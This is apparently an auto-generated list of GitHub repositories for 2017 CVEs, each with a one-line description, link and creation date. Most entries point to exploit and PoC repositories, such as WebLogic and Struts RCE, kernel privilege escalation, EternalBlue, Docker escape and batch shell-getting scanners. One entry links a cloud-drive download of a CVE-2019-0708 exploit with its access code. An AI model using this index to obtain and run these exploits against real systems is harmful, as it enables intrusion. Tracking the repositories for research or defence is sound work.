**PowerDNS CVE-2017-15120 / DO NOT ABUSE** : [shutingrz/CVE-2017-15120_PoC](https://api.github.com/repos/shutingrz/CVE-2017-15120_PoC) create time: 2018-10-16T15:08:15Z

**None** : [j0lama/CVE-2017-11882](https://api.github.com/repos/j0lama/CVE-2017-11882) create time: 2018-10-23T07:44:39Z

**CVE-2017-7269 回显PoC ,用于远程漏洞检测..** : [lcatro/CVE-2017-7269-Echo-PoC](https://api.github.com/repos/lcatro/CVE-2017-7269-Echo-PoC) create time: 2017-03-29T11:20:19Z

**CVE_2017_11882** : [letiencong96/CVE_2017_11882](https://api.github.com/repos/letiencong96/CVE_2017_11882) create time: 2018-10-27T16:02:01Z

**Apache Struts version analyzer (Ansible) based on CVE-2017-5638** : [andypitcher/check_struts](https://api.github.com/repos/andypitcher/check_struts) create time: 2018-09-04T18:19:26Z

**None** : [matlink/cve-2017-1000083-atril-nautilus](https://api.github.com/repos/matlink/cve-2017-1000083-atril-nautilus) create time: 2018-10-30T12:22:41Z

**Exploit for PlaySMS 1.4 authenticated RCE** : [jasperla/CVE-2017-9101](https://api.github.com/repos/jasperla/CVE-2017-9101) create time: 2018-11-06T19:16:29Z

**CVE-2017-11882 analyse notebook** : [R0fM1a/IDB_Share](https://api.github.com/repos/R0fM1a/IDB_Share) create time: 2018-11-08T07:44:32Z

**Bro plugin to check if certificates are affected by CVE-2017-15361** : [0xxon/zeek-plugin-roca](https://api.github.com/repos/0xxon/zeek-plugin-roca) create time: 2017-10-25T01:10:06Z

**None** : [matlink/evince-cve-2017-1000083](https://api.github.com/repos/matlink/evince-cve-2017-1000083) create time: 2018-10-30T12:18:11Z

**CVE-2017-5645 - Apache Log4j RCE due Insecure Deserialization** : [pimps/CVE-2017-5645](https://api.github.com/repos/pimps/CVE-2017-5645) create time: 2017-08-04T01:12:47Z

**None** : [tafamace/CVE-2017-12624](https://api.github.com/repos/tafamace/CVE-2017-12624) create time: 2018-11-19T10:07:55Z

**None** : [tafamace/CVE-2017-17485](https://api.github.com/repos/tafamace/CVE-2017-17485) create time: 2018-11-19T09:29:28Z

**None** : [tafamace/CVE-2017-2666](https://api.github.com/repos/tafamace/CVE-2017-2666) create time: 2018-11-19T10:33:25Z

**My first try to code my own LPE exploit.** : [DoubleMice/cve-2017-11176](https://api.github.com/repos/DoubleMice/cve-2017-11176) create time: 2018-11-13T05:55:03Z

**None** : [un4ckn0wl3z/CVE-2017-5638](https://api.github.com/repos/un4ckn0wl3z/CVE-2017-5638) create time: 2018-11-22T04:02:59Z

**None** : [Ang-YC/CVE-2017-5007](https://api.github.com/repos/Ang-YC/CVE-2017-5007) create time: 2018-11-26T11:14:13Z

**NodeJS + Postgres (Remote Code Execution) 🛰** : [nulldreams/CVE-2017-16082](https://api.github.com/repos/nulldreams/CVE-2017-16082) create time: 2018-11-27T18:09:17Z

**Weblogic(CVE-2017-10271)** : [nhwuxiaojun/CVE-2017-10271](https://api.github.com/repos/nhwuxiaojun/CVE-2017-10271) create time: 2018-12-04T14:34:10Z

**Exploit adapted for a specific PoC on Ubuntu 16.04.01** : [gugronnier/CVE-2017-16995](https://api.github.com/repos/gugronnier/CVE-2017-16995) create time: 2018-10-18T10:34:24Z

**Microsoft Equation 3.0/Convert python2 to python3** : [chanbin/CVE-2017-11882](https://api.github.com/repos/chanbin/CVE-2017-11882) create time: 2018-12-10T11:15:15Z

**Just My ports of CVE-2017-8759** : [ChaitanyaHaritash/CVE-2017-8759](https://api.github.com/repos/ChaitanyaHaritash/CVE-2017-8759) create time: 2018-12-11T21:39:39Z

**针对类似CVE-2017-10271漏洞的一个java反序列化漏洞扫描器** : [ETOCheney/JavaDeserialization](https://api.github.com/repos/ETOCheney/JavaDeserialization) create time: 2018-12-13T02:00:23Z

**None** : [qiantu88/CVE-2017-12617](https://api.github.com/repos/qiantu88/CVE-2017-12617) create time: 2018-12-19T10:26:33Z

**None** : [teawater/CVE-2017-5123](https://api.github.com/repos/teawater/CVE-2017-5123) create time: 2018-06-08T06:07:01Z

**SEH BO based exploit for Easy Chat Server on Win 7 32b** : [adenkiewicz/CVE-2017-9544](https://api.github.com/repos/adenkiewicz/CVE-2017-9544) create time: 2019-01-02T09:08:58Z

**## 在kali中自动化生成cve-2017-8570的恶意ppsx文件和配置msf监听** : [Drac0nids/CVE-2017-8570](https://api.github.com/repos/Drac0nids/CVE-2017-8570) create time: 2019-01-03T15:12:39Z

**poc for 0263** : [R06otMD5/cve-2017-0263-poc](https://api.github.com/repos/R06otMD5/cve-2017-0263-poc) create time: 2019-01-07T04:21:25Z

**cve-2017-10271** : [cved-sources/cve-2017-10271](https://api.github.com/repos/cved-sources/cve-2017-10271) create time: 2019-01-11T22:11:16Z

**cve-2017-8917** : [cved-sources/cve-2017-8917](https://api.github.com/repos/cved-sources/cve-2017-8917) create time: 2019-01-11T22:13:56Z

**None** : [Villaquiranm/5MMISSI-CVE-2017-1000499](https://api.github.com/repos/Villaquiranm/5MMISSI-CVE-2017-1000499) create time: 2019-01-05T16:33:08Z

**Proof of Concept - RCE Exploitation : Web Shell on Apache Tomcat - Ensimag January 2018** : [ygouzerh/CVE-2017-12617](https://api.github.com/repos/ygouzerh/CVE-2017-12617) create time: 2019-01-14T20:58:29Z

**cve-2017-4971** : [cved-sources/cve-2017-4971](https://api.github.com/repos/cved-sources/cve-2017-4971) create time: 2019-01-17T17:31:59Z

**Writeup for CVE-2017-16995 Linux BPF Local Privilege Escalation** : [senyuuri/cve-2017-16995](https://api.github.com/repos/senyuuri/cve-2017-16995) create time: 2019-01-22T06:42:27Z

**Struts2 Application Vulnerable to CVE-2017-5638. Explains how the exploit of the vulnerability works in relation to OGNL and the JakartaMultiPart parser.** : [grant100/cybersecurity-struts2](https://api.github.com/repos/grant100/cybersecurity-struts2) create time: 2018-01-18T15:19:39Z

**The Joomanager component through 2.0.0 for Joomla! has an Arbitrary File Download issue, resulting in exposing the Credentials of the DataBase.** : [Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD](https://api.github.com/repos/Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD) create time: 2017-07-01T19:02:45Z

**Sample project to test using Microsoft.CodeDom.Providers.DotNetCompilerPlatform 2.0.1 causing CVE-2017-0248** : [rubenmamo/CVE-2017-0248-Test](https://api.github.com/repos/rubenmamo/CVE-2017-0248-Test) create time: 2019-01-29T13:23:24Z

**cve-2017-1000117** : [cved-sources/cve-2017-1000117](https://api.github.com/repos/cved-sources/cve-2017-1000117) create time: 2019-01-17T17:28:01Z

**cve-2017-1000486** : [cved-sources/cve-2017-1000486](https://api.github.com/repos/cved-sources/cve-2017-1000486) create time: 2019-01-11T21:11:14Z

**cve-2017-12615** : [cved-sources/cve-2017-12615](https://api.github.com/repos/cved-sources/cve-2017-12615) create time: 2019-01-17T17:30:03Z

**cve-2017-7529** : [cved-sources/cve-2017-7529](https://api.github.com/repos/cved-sources/cve-2017-7529) create time: 2019-01-17T17:47:34Z

**cve-2017-8046** : [cved-sources/cve-2017-8046](https://api.github.com/repos/cved-sources/cve-2017-8046) create time: 2019-01-17T17:49:12Z

**cve-2017-7494** : [cved-sources/cve-2017-7494](https://api.github.com/repos/cved-sources/cve-2017-7494) create time: 2019-01-06T23:58:26Z

**None** : [jltxgcy/CVE_2017_7533_EXP](https://api.github.com/repos/jltxgcy/CVE_2017_7533_EXP) create time: 2019-02-12T01:28:24Z

**Exploiting CVE-2017-7525 demo project with Angular7 frontend and Spring.** : [JavanXD/Demo-Exploit-Jackson-RCE](https://api.github.com/repos/JavanXD/Demo-Exploit-Jackson-RCE) create time: 2019-01-22T14:19:54Z

**Contrail: hard coded credentials (CVE-2017-10616) and XML External Entity (XXE) vulnerability (CVE-2017-10617)** : [gteissier/CVE-2017-10617](https://api.github.com/repos/gteissier/CVE-2017-10617) create time: 2017-10-11T07:38:18Z

**CVE-2017-12149 jboss反序列化 可回显** : [yunxu1/jboss-_CVE-2017-12149](https://api.github.com/repos/yunxu1/jboss-_CVE-2017-12149) create time: 2017-11-28T02:52:47Z

**Oracle-WebLogic-CVE-2017-10271** : [XHSecurity/Oracle-WebLogic-CVE-2017-10271](https://api.github.com/repos/XHSecurity/Oracle-WebLogic-CVE-2017-10271) create time: 2019-03-15T01:50:01Z

**CVE-2017-5638 (PoC Exploits)** : [colorblindpentester/CVE-2017-5638](https://api.github.com/repos/colorblindpentester/CVE-2017-5638) create time: 2019-03-22T23:25:49Z

**This is the Pwn2Own 2017 Safari backup vul's exploit.** : [xuechiyaobai/CVE-2017-7092-PoC](https://api.github.com/repos/xuechiyaobai/CVE-2017-7092-PoC) create time: 2017-09-26T04:10:32Z

**POC for CVE-2017-10271. Since java.lang.ProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload. Added java.lang.Runtime and will add others in the future. This is for educational purposes only: I take no responsibility for how you use this code. ** : [kbsec/Weblogic_Wsat_RCE](https://api.github.com/repos/kbsec/Weblogic_Wsat_RCE) create time: 2019-03-20T15:26:55Z

**eps漏洞(CVE-2017-0261)漏洞分析** : [kcufId/eps-CVE-2017-0261](https://api.github.com/repos/kcufId/eps-CVE-2017-0261) create time: 2019-03-31T07:29:48Z

**Detecion for the vulnerability CVE-2017-15944** : [surajraghuvanshi/PaloAltoRceDetectionAndExploit](https://api.github.com/repos/surajraghuvanshi/PaloAltoRceDetectionAndExploit) create time: 2018-05-24T23:19:57Z

**cve-2017-17485 PoC** : [x7iaob/cve-2017-17485](https://api.github.com/repos/x7iaob/cve-2017-17485) create time: 2019-04-21T13:36:03Z

**None** : [KeyStrOke95/nfsen_1.3.7_CVE-2017-6971](https://api.github.com/repos/KeyStrOke95/nfsen_1.3.7_CVE-2017-6971) create time: 2019-04-24T02:45:17Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271** : [Yuusuke4/WebLogic_CNVD_C_2019_48814](https://api.github.com/repos/Yuusuke4/WebLogic_CNVD_C_2019_48814) create time: 2019-04-25T12:18:16Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm** : [7kbstorm/WebLogic_CNVD_C2019_48814](https://api.github.com/repos/7kbstorm/WebLogic_CNVD_C2019_48814) create time: 2019-04-25T12:33:31Z

**CVE-2019-2725poc汇总 更新绕过CVE-2017-10271补丁POC** : [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://api.github.com/repos/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961) create time: 2019-04-25T03:07:53Z

**Metasploit module for Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability** : [xfer0/CVE-2017-9791](https://api.github.com/repos/xfer0/CVE-2017-9791) create time: 2017-09-23T19:08:31Z

**For Metasploit pull request** : [7043mcgeep/cve-2017-8890-msf](https://api.github.com/repos/7043mcgeep/cve-2017-8890-msf) create time: 2019-05-03T04:14:17Z

**None** : [sasqwatch/CVE-2017-8570](https://api.github.com/repos/sasqwatch/CVE-2017-8570) create time: 2019-05-08T20:53:27Z

**An intentionally vulnerable (CVE-2017-8046) SrpingData REST appl with Swagger Support for pentesting purposes** : [jsotiro/VulnerableSpringDataRest](https://api.github.com/repos/jsotiro/VulnerableSpringDataRest) create time: 2019-04-27T07:23:53Z

**None** : [thinkycx/CVE-2017-8890](https://api.github.com/repos/thinkycx/CVE-2017-8890) create time: 2018-07-02T02:21:28Z

**CVE-2019-0708 EXPloit-poc 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。 漏洞评级 CVE-2019-0708 严重 安全建议 1、针对Windows 7及Windows Server 2008的用户,及时安装官方安全补丁:https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175 2、针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 CVE-2019-0708 EXPloit-poc 影响版本 Windows7 XP Windows 2003 Windows Server 2008 Windows Server 2008 R2 EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-Poc-exploit](https://api.github.com/repos/sbkcbig/CVE-2019-0708-Poc-exploit) create time: 2019-05-15T20:26:34Z

**None** : [leezp/CVE-2017-1000117](https://api.github.com/repos/leezp/CVE-2017-1000117) create time: 2019-05-20T07:25:58Z

**None** : [caxmd/CVE-2017-13156](https://api.github.com/repos/caxmd/CVE-2017-13156) create time: 2019-05-27T20:32:05Z

**yehnah** : [smashinu/CVE-2017-8759Expoit](https://api.github.com/repos/smashinu/CVE-2017-8759Expoit) create time: 2019-05-24T06:29:45Z

**CVE-2017-0144** : [kimocoder/eternalblue](https://api.github.com/repos/kimocoder/eternalblue) create time: 2019-06-02T03:41:47Z

**Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)** : [mogwailabs/CVE-2017-1000486](https://api.github.com/repos/mogwailabs/CVE-2017-1000486) create time: 2018-10-17T22:47:30Z

**None** : [MaxSecurity/CVE-2017-7529-POC](https://api.github.com/repos/MaxSecurity/CVE-2017-7529-POC) create time: 2019-06-06T14:47:17Z

**POC of CVE-2017-5487 + tool** : [GeunSam2/CVE-2017-5487](https://api.github.com/repos/GeunSam2/CVE-2017-5487) create time: 2019-06-10T15:07:17Z

**None** : [whisp1830/CVE-2017-15715](https://api.github.com/repos/whisp1830/CVE-2017-15715) create time: 2019-06-21T04:05:32Z

**CVE-2017-1000117漏洞复现(PoC+Exp)** : [AnonymKing/CVE-2017-1000117](https://api.github.com/repos/AnonymKing/CVE-2017-1000117) create time: 2019-06-20T02:55:19Z

**CVE-2017-8759 微软word漏洞利用脚本** : [adeljck/CVE-2017-8759](https://api.github.com/repos/adeljck/CVE-2017-8759) create time: 2019-06-25T02:17:04Z

**weblogic_CVE_2017_10271漏洞批量检测&getshell** : [rambleZzz/weblogic_CVE_2017_10271](https://api.github.com/repos/rambleZzz/weblogic_CVE_2017_10271) create time: 2019-06-28T01:17:32Z

**Binary** : [Jos675/CVE-2017-0213-Exploit](https://api.github.com/repos/Jos675/CVE-2017-0213-Exploit) create time: 2019-06-27T05:56:35Z

**Exploit for TSIG bypass vulnerabilities in Bind (CVE-2017-3143) and Knot DNS (CVE-2017-11104)** : [saaph/CVE-2017-3143](https://api.github.com/repos/saaph/CVE-2017-3143) create time: 2019-07-10T16:25:15Z

**CVE-2017-16995 eBPF PoC for Ubuntu 16.04** : [vnik5287/CVE-2017-16995](https://api.github.com/repos/vnik5287/CVE-2017-16995) create time: 2019-07-23T12:37:27Z

**An internet scanner for exploit CVE-2017-0144 (Eternal Blue) & CVE-2017-0145 (Eternal Romance)** : [peterpt/eternal_scanner](https://api.github.com/repos/peterpt/eternal_scanner) create time: 2017-07-16T19:44:04Z

**None** : [securifera/CVE-2017-9830](https://api.github.com/repos/securifera/CVE-2017-9830) create time: 2019-08-03T03:29:12Z

**None** : [HckEX/CVE-2017-11176](https://api.github.com/repos/HckEX/CVE-2017-11176) create time: 2019-08-08T01:02:52Z

**CVE-2017-16995 ubuntun本地提权 POC** : [littlebin404/CVE-2017-16995](https://api.github.com/repos/littlebin404/CVE-2017-16995) create time: 2019-08-14T08:21:05Z

**used to generate a valid attack chain to exploit CVE-2017-11774 tied to iranian apt only reasearch poc dont use for harm please** : [devcoinfet/SniperRoost](https://api.github.com/repos/devcoinfet/SniperRoost) create time: 2019-08-16T01:25:13Z

**CodePath Assignment for Weeks 7 & 8: CVE-2017-14719, CVE-2019-9787 & Unauthenticated Page/Post Content Modification via REST API** : [PalmTreeForest/CodePath_Week_7-8](https://api.github.com/repos/PalmTreeForest/CodePath_Week_7-8) create time: 2019-08-18T04:50:37Z

**Exploit CVE-2017-16088 ** : [Flyy-yu/CVE-2017-16088](https://api.github.com/repos/Flyy-yu/CVE-2017-16088) create time: 2019-08-18T16:22:46Z

**jar(linux) for CVE-2017-7525 ** : [47bwy/CVE-2017-7525](https://api.github.com/repos/47bwy/CVE-2017-7525) create time: 2019-08-21T07:23:24Z

**Jboss Java Deserialization RCE (CVE-2017-12149)** : [jreppiks/CVE-2017-12149](https://api.github.com/repos/jreppiks/CVE-2017-12149) create time: 2019-08-22T21:06:09Z

**Scan a list of given IP's for CVE-2017-12542** : [sk1dish/ilo4-rce-vuln-scanner](https://api.github.com/repos/sk1dish/ilo4-rce-vuln-scanner) create time: 2019-08-16T00:03:29Z

**Simple python script to fuzz site for CVE-2017-9805** : [UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-](https://api.github.com/repos/UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-) create time: 2019-08-31T22:06:31Z

**A script to Fuzz and and exploit Apache struts CVE-2017-9805** : [UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit](https://api.github.com/repos/UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit) create time: 2019-09-02T22:24:07Z

**None** : [Lynggaard91/windows2016fixCVE-2017-8529](https://api.github.com/repos/Lynggaard91/windows2016fixCVE-2017-8529) create time: 2019-09-03T20:39:59Z

**Demo app of THAT data broker's security breach** : [injcristianrojas/cve-2017-5638](https://api.github.com/repos/injcristianrojas/cve-2017-5638) create time: 2019-08-15T22:27:23Z

** Proof of Concept (PoC) for CVE: 2017-16744 and 2017-16748** : [GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara](https://api.github.com/repos/GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara) create time: 2019-09-09T19:08:59Z

**PoC for CVE-2017-0075** : [4B5F5F4B/HyperV](https://api.github.com/repos/4B5F5F4B/HyperV) create time: 2019-09-12T02:45:07Z

**None** : [wzxmt/CVE-2017](https://api.github.com/repos/wzxmt/CVE-2017) create time: 2019-09-17T15:52:00Z

**Escape from Docker using CVE-2017-1000112 and CVE-2017-18344, including gaining root privilage, get all capbilities, namespace recovery, filesystem recovery, cgroup limitation bypass and seccomp bypass.** : [hikame/docker_escape_pwn](https://api.github.com/repos/hikame/docker_escape_pwn) create time: 2019-09-17T07:38:47Z

**The study of vulnerability CVE-2017-3066. Java deserialization** : [cucadili/CVE-2017-3066](https://api.github.com/repos/cucadili/CVE-2017-3066) create time: 2019-10-09T11:13:00Z

**CVE-2017-14948 for D-Link 880 Firmware** : [badnack/d_link_880_bug](https://api.github.com/repos/badnack/d_link_880_bug) create time: 2019-10-12T17:29:36Z

**None** : [sharmasandeepkr/PS-2017-13---CVE-2018-9950](https://api.github.com/repos/sharmasandeepkr/PS-2017-13---CVE-2018-9950) create time: 2019-10-15T06:47:00Z

**PoC for CVE-2017-18635** : [ShielderSec/CVE-2017-18635](https://api.github.com/repos/ShielderSec/CVE-2017-18635) create time: 2019-10-16T21:27:40Z

**CVE-2017-9506** : [pwn1sher/jira-ssrf](https://api.github.com/repos/pwn1sher/jira-ssrf) create time: 2019-10-21T07:26:18Z

**None** : [cyberheartmi9/CVE-2017-8295](https://api.github.com/repos/cyberheartmi9/CVE-2017-8295) create time: 2017-05-06T09:51:01Z

**A collection of tools for the Janus exploit [CVE-2017-13156].** : [giacomoferretti/janus-toolkit](https://api.github.com/repos/giacomoferretti/janus-toolkit) create time: 2019-08-25T16:31:16Z

**None** : [ictnamanh/CVE-2017-9248](https://api.github.com/repos/ictnamanh/CVE-2017-9248) create time: 2019-10-23T13:57:11Z

**Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)** : [bmcculley/CVE-2017-10271](https://api.github.com/repos/bmcculley/CVE-2017-10271) create time: 2018-01-18T22:07:33Z

**This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).** : [m3ssap0/spring-break_cve-2017-8046](https://api.github.com/repos/m3ssap0/spring-break_cve-2017-8046) create time: 2018-03-09T20:51:19Z

**Exploit for CVE-2017-8465** : [nghiadt1098/CVE-2017-8465](https://api.github.com/repos/nghiadt1098/CVE-2017-8465) create time: 2019-10-29T09:06:23Z

**Standalone Python 3 exploit for CVE-2017-17562** : [ivanitlearning/CVE-2017-17562](https://api.github.com/repos/ivanitlearning/CVE-2017-17562) create time: 2019-10-16T16:28:27Z

**CVE-2017-0005 POC** : [sheri31/0005poc](https://api.github.com/repos/sheri31/0005poc) create time: 2019-11-05T04:18:08Z

**Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2** : [ivanitlearning/CVE-2017-11610](https://api.github.com/repos/ivanitlearning/CVE-2017-11610) create time: 2019-11-02T10:58:12Z

** (CVE-2017-10271)Java反序列化漏洞** : [ianxtianxt/-CVE-2017-10271-](https://api.github.com/repos/ianxtianxt/-CVE-2017-10271-) create time: 2019-11-05T13:33:56Z

**CVE-2017-3248** : [ianxtianxt/CVE-2017-3248](https://api.github.com/repos/ianxtianxt/CVE-2017-3248) create time: 2019-11-05T13:59:31Z

**CVE-2017-3506** : [ianxtianxt/CVE-2017-3506](https://api.github.com/repos/ianxtianxt/CVE-2017-3506) create time: 2019-11-05T14:11:56Z

**Exploitable target to CVE-2017-5638** : [Iletee/struts2-rce](https://api.github.com/repos/Iletee/struts2-rce) create time: 2018-06-26T10:21:50Z

**None** : [beraphin/CVE-2017-16943](https://api.github.com/repos/beraphin/CVE-2017-16943) create time: 2018-11-20T09:46:25Z

**SpecuCheck is a Windows utility for checking the state of the software mitigations and hardware against CVE-2017-5754 (Meltdown), CVE-2017-5715 (Spectre v2), CVE-2018-3260 (Foreshadow), and CVE-2018-3639 (Spectre v4)** : [ionescu007/SpecuCheck](https://api.github.com/repos/ionescu007/SpecuCheck) create time: 2018-01-04T04:32:26Z

**None** : [crispy-peppers/Goahead-CVE-2017-17562](https://api.github.com/repos/crispy-peppers/Goahead-CVE-2017-17562) create time: 2019-11-23T08:40:49Z

**Assesses a system for the "speculative execution" vulnerabilities described in CVE-2017-5715, CVE-2017-5753, CVE-2017-5754** : [GregAskew/SpeculativeExecutionAssessment](https://api.github.com/repos/GregAskew/SpeculativeExecutionAssessment) create time: 2018-01-15T19:14:30Z

**Exploit for CVE-2017-12945.** : [aress31/cve-2017-12945](https://api.github.com/repos/aress31/cve-2017-12945) create time: 2019-11-27T09:31:28Z

**None** : [afbase/CVE-2017-10952](https://api.github.com/repos/afbase/CVE-2017-10952) create time: 2019-11-24T02:01:24Z

**Case study and POC of CVE-2017-12635: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation** : [assalielmehdi/CVE-2017-12635](https://api.github.com/repos/assalielmehdi/CVE-2017-12635) create time: 2019-11-07T20:02:31Z

**Demo for CVE-2017-7525** : [BassinD/jackson-RCE](https://api.github.com/repos/BassinD/jackson-RCE) create time: 2019-12-19T07:45:21Z

**POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP vulnerability.** : [breaktoprotect/CVE-2017-12615](https://api.github.com/repos/breaktoprotect/CVE-2017-12615) create time: 2017-09-23T06:15:48Z

**None** : [leonardo1101/cve-2017-11176](https://api.github.com/repos/leonardo1101/cve-2017-11176) create time: 2019-10-23T00:16:03Z

**samba 4.5.9 ** : [john-80/cve-2017-7494](https://api.github.com/repos/john-80/cve-2017-7494) create time: 2019-12-30T04:33:39Z

**CVE-2017-8759 use file** : [zhengkook/CVE-2017-8759](https://api.github.com/repos/zhengkook/CVE-2017-8759) create time: 2020-01-02T07:43:19Z

**Honeypot for Intel's AMT Firmware Vulnerability CVE-2017-5689** : [x1sec/amthoneypot](https://api.github.com/repos/x1sec/amthoneypot) create time: 2017-05-06T15:35:42Z

**Simple Overflow demo, like CVE-2017-11882 exp** : [ekgg/Overflow-Demo-CVE-2017-11882](https://api.github.com/repos/ekgg/Overflow-Demo-CVE-2017-11882) create time: 2020-01-08T16:27:18Z

**CVE-2017-9841 detector script** : [mbrasile/CVE-2017-9841](https://api.github.com/repos/mbrasile/CVE-2017-9841) create time: 2020-01-06T23:27:15Z

**Mini-paper on CVE-2017-2751, HP EFI password extraction.** : [BaderSZ/CVE-2017-2751](https://api.github.com/repos/BaderSZ/CVE-2017-2751) create time: 2020-01-19T00:41:23Z

**CVE-2017-10271 Weblogic 漏洞验证Poc及补丁** : [pssss/CVE-2017-10271](https://api.github.com/repos/pssss/CVE-2017-10271) create time: 2018-01-16T03:10:48Z

**CVE-2017-12615 批量脚本** : [ianxtianxt/CVE-2017-12615](https://api.github.com/repos/ianxtianxt/CVE-2017-12615) create time: 2020-01-20T14:56:05Z

**Exploit CVE-2017-9248 Telerik ReMix from Paul Taylor's script. Exploit Telerik lastest version fixed vuln. ReMix by TinoKa & Shaco JX** : [shacojx/dp](https://api.github.com/repos/shacojx/dp) create time: 2020-01-20T07:13:54Z

**CVE-2017-8809 Docker - RFD(Reflected File Download) for MediaWiki** : [motikan2010/CVE-2017-8809_MediaWiki_RFD](https://api.github.com/repos/motikan2010/CVE-2017-8809_MediaWiki_RFD) create time: 2020-01-22T10:21:51Z

**Running CVE-2017-8759 exploit sample.** : [Voulnet/CVE-2017-8759-Exploit-sample](https://api.github.com/repos/Voulnet/CVE-2017-8759-Exploit-sample) create time: 2017-09-13T09:50:04Z

**None** : [FXTi/CVE201713287POC](https://api.github.com/repos/FXTi/CVE201713287POC) create time: 2020-01-30T13:27:45Z

**My CVE-2017-8529 files** : [sfitpro/cve-2017-8529](https://api.github.com/repos/sfitpro/cve-2017-8529) create time: 2020-02-09T05:46:20Z

**POE code for CVE-2017-1000112 adapted to both funtion on a specific VM and Escape a Docker** : [ol0273st-s/CVE-2017-1000112-Adpated](https://api.github.com/repos/ol0273st-s/CVE-2017-1000112-Adpated) create time: 2020-02-14T13:03:00Z

**CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002** : [wetw0rk/Exploit-Development](https://api.github.com/repos/wetw0rk/Exploit-Development) create time: 2017-04-26T02:03:43Z

**Jackson Deserialization CVE-2017-7525 PoC** : [Dannners/jackson-deserialization-2017-7525](https://api.github.com/repos/Dannners/jackson-deserialization-2017-7525) create time: 2020-03-02T00:10:09Z

**Proof of concept for CVE-2017-6640 as burp extension** : [hemp3l/CVE-2017-6640-POC](https://api.github.com/repos/hemp3l/CVE-2017-6640-POC) create time: 2020-03-11T15:32:44Z

**CVE-2017-12636|exploit Couchdb ** : [RedTeamWing/CVE-2017-12636](https://api.github.com/repos/RedTeamWing/CVE-2017-12636) create time: 2020-03-23T10:11:04Z

**Code execution for CVE-2017-11176** : [c3r34lk1ll3r/CVE-2017-11176](https://api.github.com/repos/c3r34lk1ll3r/CVE-2017-11176) create time: 2020-04-10T12:44:05Z

**漏洞环境复现** : [scxiaotan1/Docker](https://api.github.com/repos/scxiaotan1/Docker) create time: 2020-04-17T02:51:07Z

**Exploits for CVE-2017-6008, a kernel pool buffer overflow leading to privilege escalation.** : [cbayet/Exploit-CVE-2017-6008](https://api.github.com/repos/cbayet/Exploit-CVE-2017-6008) create time: 2017-05-30T09:55:55Z

**WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution vulnerability.** : [Cymmetria/weblogic_honeypot](https://api.github.com/repos/Cymmetria/weblogic_honeypot) create time: 2018-02-07T06:11:23Z

**WordPress CVE-2017-5487 Exploit in Python** : [patilkr/wp-CVE-2017-5487-exploit](https://api.github.com/repos/patilkr/wp-CVE-2017-5487-exploit) create time: 2020-04-26T08:17:41Z

**CVE-2017-10271** : [testwc/CVE-2017-10271](https://api.github.com/repos/testwc/CVE-2017-10271) create time: 2020-04-06T02:01:20Z

**A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root.** : [Hansindu-M/CVE-2017-7494_IT19115344](https://api.github.com/repos/Hansindu-M/CVE-2017-7494_IT19115344) create time: 2020-05-10T21:17:55Z

**None** : [p1gz/CVE-2017-5941-NodeJS-RCE](https://api.github.com/repos/p1gz/CVE-2017-5941-NodeJS-RCE) create time: 2020-05-12T07:33:37Z

**None** : [sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-](https://api.github.com/repos/sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-) create time: 2020-05-12T10:57:11Z

**CVE-2017-5638** : [pasannirmana/Aspire](https://api.github.com/repos/pasannirmana/Aspire) create time: 2020-05-12T16:42:51Z

**None** : [Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-](https://api.github.com/repos/Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-) create time: 2020-05-12T16:19:10Z

**Exploit work Privilege Escalation CVE-2017-1000112** : [IT19083124/SNP-Assignment](https://api.github.com/repos/IT19083124/SNP-Assignment) create time: 2020-05-12T17:07:11Z

**None** : [BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074](https://api.github.com/repos/BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074) create time: 2020-05-12T17:13:43Z

**CVE-2017-8759 || report related with execute code vulnerability** : [varunsaru/SNP](https://api.github.com/repos/varunsaru/SNP) create time: 2020-05-12T15:11:42Z

